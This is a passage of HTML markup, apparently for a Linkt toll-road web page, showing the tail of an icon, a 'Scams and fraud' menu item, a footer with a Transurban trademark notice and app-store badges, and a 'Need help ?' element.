1.43-.032zm-1.3 1.623c-.306.024-.452.069-.548.118a1.33 1.33 0 00-.581.581c-.05.097-.094.243-.119.548-.026.315-.026.724-.026 1.333v8.085c0 .609 0 1.017.026 1.332.025.306.07.452.119.548.127.25.33.454.58.581.097.05.243.094.549.119.314.025.723.026 1.332.026H17.54c.609 0 1.018 0 1.332-.026.306-.025.452-.07.548-.119.25-.127.454-.33.581-.581.05-.096.094-.242.119-.548.026-.315.026-.723.026-1.332V12.71c0-.61 0-1.018-.026-1.333-.025-.305-.07-.451-.119-.548a1.33 1.33 0 00-.58-.58c-.097-.05-.243-.095-.549-.12-.314-.025-.723-.026-1.332-.026H7.327c-.609 0-1.018 0-1.332.027z"></path></g></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath><clipPath id="clip1"><path fill="#fff" d="M0 0h25v25.002H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Scamsandfraud.png" alt=""> -->
                    <span>Scams and fraud</span>
                </li>
            </ul>
        </div>
   </section>



   <footer>
        <div class="footerContainer">
            <div class="footerContainer1">
                <div class="footer1">
                    <div class="footer1_01">
                        <p>Operated by</p>
                        <img src="../../assets/img/logoTranban.png" alt="">
                    </div>
                </div>
                <div class="footer2">
                    <div class="footer2_01">
                        <div class="footer2_01_1">
                            <ul>
                                <li>About us</li>
                                <li>Privacy</li>
                                <li>Legal</li>
                                <li>Contact us</li>
                                <li>Help</li>
                            </ul>
                        </div>
                        <div class="footer2_01_2">
                            <p>Linkt and Linkt Brisbane are trade marks of Transurban Limited used under licence by Queensland Motorways Management Pty Ltd ABN 86 010 630 921.</p>
                            <div class="footer2_01_2img">
                                <img src="../../assets/img/btNplaystore.svg" alt="">
                                <img src="../../assets/img/AStore.svg" alt="">
                            </div>
                        </div>
                    </div>
                </div>
                <div class="footer3">
                    <div class="footer3_01">
                        <ul>
                            <li><a href=""><div class="footer01_01_3_01FB"><img src="../../assets/img/facebook.svg" alt=""></div></a></li>
                            <li><a href=""><div class="footer01_01_3_01FB"><img src="../../assets/img/twitter.svg" alt=""></div></a></li>
                            <li><a href=""><div class="footer01_01_3_01FB"><img src="../../assets/img/youtube.svg" alt=""></div></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
   </footer>
   <div class="ooxx00">Need help ?</div>   

</body>
</html>